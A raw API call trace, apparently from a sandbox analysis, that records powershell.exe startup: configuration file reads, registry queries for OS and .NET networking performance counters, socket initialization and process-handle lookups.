	[0867.187] CoTaskMemAlloc (cb=0x104) returned 0x3cbe50
	[0867.187] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0867.187] CoTaskMemFree (pv=0x3cbe50) 
	[0867.189] CoTaskMemAlloc (cb=0x104) returned 0x3cbe50
	[0867.189] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0867.189] CoTaskMemFree (pv=0x3cbe50) 
	[0867.191] CoTaskMemAlloc (cb=0x104) returned 0x3cbe50
	[0867.191] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0867.191] CoTaskMemFree (pv=0x3cbe50) 
	[0867.194] CoTaskMemAlloc (cb=0x104) returned 0x3cbe50
	[0867.194] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0867.194] CoTaskMemFree (pv=0x3cbe50) 
	[0867.195] CoTaskMemAlloc (cb=0x104) returned 0x3cbe50
	[0867.195] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0867.195] CoTaskMemFree (pv=0x3cbe50) 
	[0867.197] CoTaskMemAlloc (cb=0x104) returned 0x3cbe50
	[0867.197] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0867.197] CoTaskMemFree (pv=0x3cbe50) 
	[0867.199] CoTaskMemAlloc (cb=0x104) returned 0x3cbe50
	[0867.199] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0867.199] CoTaskMemFree (pv=0x3cbe50) 
	[0867.217] CoTaskMemAlloc (cb=0x104) returned 0x3cbe50
	[0867.217] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0867.217] CoTaskMemFree (pv=0x3cbe50) 
	[0868.600] CoTaskMemAlloc (cb=0x104) returned 0x3cbe50
	[0868.600] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0868.600] CoTaskMemFree (pv=0x3cbe50) 
	[0868.604] CoTaskMemAlloc (cb=0x104) returned 0x3cbe50
	[0868.604] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0868.604] CoTaskMemFree (pv=0x3cbe50) 
	[0868.608] CoTaskMemAlloc (cb=0x104) returned 0x3cbe50
	[0868.608] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0868.608] CoTaskMemFree (pv=0x3cbe50) 
	[0868.612] CoTaskMemAlloc (cb=0x104) returned 0x3cbe50
	[0868.612] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbe50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0868.612] CoTaskMemFree (pv=0x3cbe50) 
	[0891.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c69dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0891.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c69d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0891.376] CoTaskMemAlloc (cb=0x20c) returned 0x1b8294d0
	[0891.377] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b8294d0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0891.377] CoTaskMemFree (pv=0x1b8294d0) 
	[0891.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c69db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0891.388] GetCurrentProcess () returned 0xffffffffffffffff
	[0891.388] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c69daa8 | out: TokenHandle=0x1c69daa8*=0x360) returned 1
	[0891.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x1c69d700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", lpFilePart=0x0) returned 0x30
	[0891.394] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c69db50 | out: lpFileInformation=0x1c69db50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0891.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c69d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0897.286] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c69db00 | out: lpFileInformation=0x1c69db00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0897.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c69d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0897.911] SetErrorMode (uMode=0x1) returned 0x1
	[0897.911] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x350
	[0897.911] GetFileType (hFile=0x350) returned 0x1
	[0897.911] SetErrorMode (uMode=0x1) returned 0x1
	[0897.912] GetFileType (hFile=0x350) returned 0x1
	[0897.914] GetFileSize (in: hFile=0x350, lpFileSizeHigh=0x1c69daf8 | out: lpFileSizeHigh=0x1c69daf8*=0x0) returned 0x622a
	[0897.914] ReadFile (in: hFile=0x350, lpBuffer=0x2fb2408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c69da18, lpOverlapped=0x0 | out: lpBuffer=0x2fb2408*, lpNumberOfBytesRead=0x1c69da18*=0x1000, lpOverlapped=0x0) returned 1
	[0897.925] ReadFile (in: hFile=0x350, lpBuffer=0x2fb2408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c69d548, lpOverlapped=0x0 | out: lpBuffer=0x2fb2408*, lpNumberOfBytesRead=0x1c69d548*=0x1000, lpOverlapped=0x0) returned 1
	[0897.926] ReadFile (in: hFile=0x350, lpBuffer=0x2fb2408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c69d548, lpOverlapped=0x0 | out: lpBuffer=0x2fb2408*, lpNumberOfBytesRead=0x1c69d548*=0x1000, lpOverlapped=0x0) returned 1
	[0897.926] ReadFile (in: hFile=0x350, lpBuffer=0x2fb2408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c69d548, lpOverlapped=0x0 | out: lpBuffer=0x2fb2408*, lpNumberOfBytesRead=0x1c69d548*=0x1000, lpOverlapped=0x0) returned 1
	[0897.926] ReadFile (in: hFile=0x350, lpBuffer=0x2fb2408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c69d548, lpOverlapped=0x0 | out: lpBuffer=0x2fb2408*, lpNumberOfBytesRead=0x1c69d548*=0x1000, lpOverlapped=0x0) returned 1
	[0897.936] ReadFile (in: hFile=0x350, lpBuffer=0x2fb2408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c69d688, lpOverlapped=0x0 | out: lpBuffer=0x2fb2408*, lpNumberOfBytesRead=0x1c69d688*=0x1000, lpOverlapped=0x0) returned 1
	[0897.936] ReadFile (in: hFile=0x350, lpBuffer=0x2fb2408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c69d508, lpOverlapped=0x0 | out: lpBuffer=0x2fb2408*, lpNumberOfBytesRead=0x1c69d508*=0x22a, lpOverlapped=0x0) returned 1
	[0897.937] ReadFile (in: hFile=0x350, lpBuffer=0x2fb2408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c69d5a8, lpOverlapped=0x0 | out: lpBuffer=0x2fb2408*, lpNumberOfBytesRead=0x1c69d5a8*=0x0, lpOverlapped=0x0) returned 1
	[0897.937] CloseHandle (hObject=0x350) returned 1
	[0897.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c69dad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0897.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c69d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0897.939] CoTaskMemAlloc (cb=0x20c) returned 0x1b8294d0
	[0897.939] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b8294d0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0897.940] CoTaskMemFree (pv=0x1b8294d0) 
	[0897.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c69db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0897.941] GetCurrentProcess () returned 0xffffffffffffffff
	[0897.941] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c69dd08 | out: TokenHandle=0x1c69dd08*=0x350) returned 1
	[0897.942] GetCurrentProcess () returned 0xffffffffffffffff
	[0897.942] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c69dd08 | out: TokenHandle=0x1c69dd08*=0x3ac) returned 1
	[0897.944] GetCurrentProcess () returned 0xffffffffffffffff
	[0897.944] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c69daa8 | out: TokenHandle=0x1c69daa8*=0x378) returned 1
	[0897.944] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c69db50 | out: lpFileInformation=0x1c69db50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0897.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c69d6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0897.946] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1c69db00 | out: lpFileInformation=0x1c69db00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0897.947] GetCurrentProcess () returned 0xffffffffffffffff
	[0897.947] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c69dd08 | out: TokenHandle=0x1c69dd08*=0x37c) returned 1
	[0897.948] GetCurrentProcess () returned 0xffffffffffffffff
	[0897.948] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c69dd08 | out: TokenHandle=0x1c69dd08*=0x380) returned 1
	[0898.778] GetCurrentProcess () returned 0xffffffffffffffff
	[0898.778] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c69d988 | out: TokenHandle=0x1c69d988*=0x384) returned 1
	[0899.418] GetCurrentProcess () returned 0xffffffffffffffff
	[0899.418] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c69d988 | out: TokenHandle=0x1c69d988*=0x388) returned 1
	[0899.436] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x38c
	[0899.436] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x390
	[0900.171] GetCurrentProcess () returned 0xffffffffffffffff
	[0900.171] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c69d958 | out: TokenHandle=0x1c69d958*=0x3b0) returned 1
	[0900.181] GetCurrentProcess () returned 0xffffffffffffffff
	[0900.181] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c69d958 | out: TokenHandle=0x1c69d958*=0x374) returned 1
	[0900.195] GetCurrentProcess () returned 0xffffffffffffffff
	[0900.196] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c69d898 | out: TokenHandle=0x1c69d898*=0x398) returned 1
	[0900.204] GetCurrentProcess () returned 0xffffffffffffffff
	[0900.204] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c69d898 | out: TokenHandle=0x1c69d898*=0x39c) returned 1
	[0900.206] GetCurrentProcess () returned 0xffffffffffffffff
	[0900.206] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c69ded8 | out: TokenHandle=0x1c69ded8*=0x394) returned 1
	[0900.893] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c69bf98 | out: phkResult=0x1c69bf98*=0x3b8) returned 0x0
	[0900.893] RegQueryValueExW (in: hKey=0x3b8, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c69bf1c, lpData=0x0, lpcbData=0x1c69bf18*=0x0 | out: lpType=0x1c69bf1c*=0x1, lpData=0x0, lpcbData=0x1c69bf18*=0xe) returned 0x0
	[0900.893] CoTaskMemAlloc (cb=0x12) returned 0x1b8563e0
	[0900.893] RegQueryValueExW (in: hKey=0x3b8, lpValueName="InstallationType", lpReserved=0x0, lpType=0x1c69beec, lpData=0x1b8563e0, lpcbData=0x1c69bee8*=0xe | out: lpType=0x1c69beec*=0x1, lpData="Client", lpcbData=0x1c69bee8*=0xe) returned 0x0
	[0900.893] CoTaskMemFree (pv=0x1b8563e0) 
	[0900.893] RegCloseKey (hKey=0x3b8) returned 0x0
	[0900.903] CoTaskMemAlloc (cb=0xcd0) returned 0x1b859800
	[0900.903] RasEnumConnectionsW (in: param_1=0x1b859800, param_2=0x1c69df2c, param_3=0x1c69df28 | out: param_1=0x1b859800, param_2=0x1c69df2c, param_3=0x1c69df28) returned 0x0
	[0900.908] CoTaskMemFree (pv=0x1b859800) 
	[0900.915] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x1c69dd38 | out: lpWSAData=0x1c69dd38) returned 0
	[0900.925] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x404
	[0900.929] setsockopt (s=0x404, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0900.929] closesocket (s=0x404) returned 0
	[0901.292] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x404
	[0901.294] setsockopt (s=0x404, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0901.294] closesocket (s=0x404) returned 0
	[0901.300] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.300] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c69d5b8 | out: TokenHandle=0x1c69d5b8*=0x404) returned 1
	[0901.312] GetCurrentProcess () returned 0xffffffffffffffff
	[0901.312] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c69d5b8 | out: TokenHandle=0x1c69d5b8*=0x408) returned 1
	[0901.785] GetCurrentProcessId () returned 0xfe0
	[0901.798] CoTaskMemAlloc (cb=0x204) returned 0x356960
	[0901.798] GetComputerNameW (in: lpBuffer=0x356960, nSize=0x2fe1070 | out: lpBuffer="XDUWTFONO", nSize=0x2fe1070) returned 1
	[0901.799] CoTaskMemFree (pv=0x356960) 
	[0901.800] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c69da98 | out: phkResult=0x1c69da98*=0x40c) returned 0x0
	[0901.800] RegQueryValueExW (in: hKey=0x40c, lpValueName="Library", lpReserved=0x0, lpType=0x1c69da1c, lpData=0x0, lpcbData=0x1c69da18*=0x0 | out: lpType=0x1c69da1c*=0x1, lpData=0x0, lpcbData=0x1c69da18*=0x1c) returned 0x0
	[0901.800] CoTaskMemAlloc (cb=0x20) returned 0x1b851db0
	[0901.800] RegQueryValueExW (in: hKey=0x40c, lpValueName="Library", lpReserved=0x0, lpType=0x1c69d9ec, lpData=0x1b851db0, lpcbData=0x1c69d9e8*=0x1c | out: lpType=0x1c69d9ec*=0x1, lpData="netfxperf.dll", lpcbData=0x1c69d9e8*=0x1c) returned 0x0
	[0901.800] CoTaskMemFree (pv=0x1b851db0) 
	[0901.800] RegQueryValueExW (in: hKey=0x40c, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c69da1c, lpData=0x0, lpcbData=0x1c69da18*=0x0 | out: lpType=0x1c69da1c*=0x4, lpData=0x0, lpcbData=0x1c69da18*=0x4) returned 0x0
	[0901.801] RegQueryValueExW (in: hKey=0x40c, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x1c69da20, lpData=0x1c69da1c, lpcbData=0x1c69da18*=0x4 | out: lpType=0x1c69da20*=0x4, lpData=0x1c69da1c*=0x1, lpcbData=0x1c69da18*=0x4) returned 0x0
	[0901.801] RegQueryValueExW (in: hKey=0x40c, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c69da1c, lpData=0x0, lpcbData=0x1c69da18*=0x0 | out: lpType=0x1c69da1c*=0x4, lpData=0x0, lpcbData=0x1c69da18*=0x4) returned 0x0
	[0901.801] RegQueryValueExW (in: hKey=0x40c, lpValueName="First Counter", lpReserved=0x0, lpType=0x1c69da20, lpData=0x1c69da1c, lpcbData=0x1c69da18*=0x4 | out: lpType=0x1c69da20*=0x4, lpData=0x1c69da1c*=0x137a, lpcbData=0x1c69da18*=0x4) returned 0x0
	[0901.801] RegCloseKey (hKey=0x40c) returned 0x0
	[0901.804] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c69da58 | out: phkResult=0x1c69da58*=0x40c) returned 0x0
	[0901.804] RegQueryValueExW (in: hKey=0x40c, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c69d9dc, lpData=0x0, lpcbData=0x1c69d9d8*=0x0 | out: lpType=0x1c69d9dc*=0x4, lpData=0x0, lpcbData=0x1c69d9d8*=0x4) returned 0x0
	[0901.805] RegQueryValueExW (in: hKey=0x40c, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c69d9e0, lpData=0x1c69d9dc, lpcbData=0x1c69d9d8*=0x4 | out: lpType=0x1c69d9e0*=0x4, lpData=0x1c69d9dc*=0x3, lpcbData=0x1c69d9d8*=0x4) returned 0x0
	[0901.805] RegQueryValueExW (in: hKey=0x40c, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c69d9dc, lpData=0x0, lpcbData=0x1c69d9d8*=0x0 | out: lpType=0x1c69d9dc*=0x4, lpData=0x0, lpcbData=0x1c69d9d8*=0x4) returned 0x0
	[0901.805] RegQueryValueExW (in: hKey=0x40c, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c69d9e0, lpData=0x1c69d9dc, lpcbData=0x1c69d9d8*=0x4 | out: lpType=0x1c69d9e0*=0x4, lpData=0x1c69d9dc*=0x20000, lpcbData=0x1c69d9d8*=0x4) returned 0x0
	[0901.805] RegQueryValueExW (in: hKey=0x40c, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c69d9dc, lpData=0x0, lpcbData=0x1c69d9d8*=0x0 | out: lpType=0x1c69d9dc*=0x3, lpData=0x0, lpcbData=0x1c69d9d8*=0xaa) returned 0x0
	[0901.805] RegQueryValueExW (in: hKey=0x40c, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c69d9dc, lpData=0x2fe4360, lpcbData=0x1c69d9d8*=0xaa | out: lpType=0x1c69d9dc*=0x3, lpData=0x2fe4360*, lpcbData=0x1c69d9d8*=0xaa) returned 0x0
	[0902.013] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1
	[0902.017] CreateFileMappingW (hFile=0xffffffffffffffff, lpFileMappingAttributes=0x1c69d990, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x0
	[0902.018] OpenFileMappingW (dwDesiredAccess=0x2, bInheritHandle=0, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x414
	[0902.020] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x1f40000
	[0902.021] VirtualQuery (in: lpAddress=0x1f40000, lpBuffer=0x1c69d988, dwLength=0x30 | out: lpBuffer=0x1c69d988*(BaseAddress=0x1f40000, AllocationBase=0x1f40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000, __alignment2=0x0)) returned 0x30
	[0902.021] LocalFree (hMem=0x1b858a00) returned 0x0
	[0902.021] RegCloseKey (hKey=0x40c) returned 0x0
	[0902.023] GetVersionExW (in: lpVersionInformation=0x1c69c960*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c69c960*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0902.024] GetVersionExW (in: lpVersionInformation=0x1c69c930*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c69c930*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0902.025] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2fe5030, cbSid=0x1c69d970 | out: pSid=0x2fe5030*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c69d970) returned 1
	[0902.027] CreateMutexW (lpMutexAttributes=0x2fe5238, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x0
	[0902.028] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net clr networking") returned 0x40c
	[0902.031] WaitForSingleObject (hHandle=0x40c, dwMilliseconds=0x1f4) returned 0x0
	[0902.089] GetCurrentProcessId () returned 0xfe0
	[0902.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe0) returned 0x418
	[0902.090] GetProcessTimes (in: hProcess=0x418, lpCreationTime=0x1c69d880, lpExitTime=0x1c69d878, lpKernelTime=0x1c69d870, lpUserTime=0x1c69d868 | out: lpCreationTime=0x1c69d880, lpExitTime=0x1c69d878, lpKernelTime=0x1c69d870, lpUserTime=0x1c69d868) returned 1
	[0902.091] CloseHandle (hObject=0x418) returned 1
	[0902.091] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17f4) returned 0x418
	[0902.091] GetProcessTimes (in: hProcess=0x418, lpCreationTime=0x1c69d910, lpExitTime=0x1c69d908, lpKernelTime=0x1c69d900, lpUserTime=0x1c69d8f8 | out: lpCreationTime=0x1c69d910, lpExitTime=0x1c69d908, lpKernelTime=0x1c69d900, lpUserTime=0x1c69d8f8) returned 1
	[0902.091] CloseHandle (hObject=0x418) returned 1
	[0902.091] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x17f4) returned 0x418
	[0902.092] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.092] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.093] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x418, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c69d868, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c69d868*=0x41c) returned 1
	[0902.094] CloseHandle (hObject=0x41c) returned 1
	[0902.094] CloseHandle (hObject=0x418) returned 1
	[0902.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f4) returned 0x418
	[0902.094] GetProcessTimes (in: hProcess=0x418, lpCreationTime=0x1c69d910, lpExitTime=0x1c69d908, lpKernelTime=0x1c69d900, lpUserTime=0x1c69d8f8 | out: lpCreationTime=0x1c69d910, lpExitTime=0x1c69d908, lpKernelTime=0x1c69d900, lpUserTime=0x1c69d8f8) returned 1
	[0902.094] CloseHandle (hObject=0x418) returned 1
	[0902.094] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x7f4) returned 0x418
	[0902.094] GetCurrentProcess () returned 0xffffffffffffffff
	[0902.094] GetCurrentProcess () returned 0xffffffffffffffff
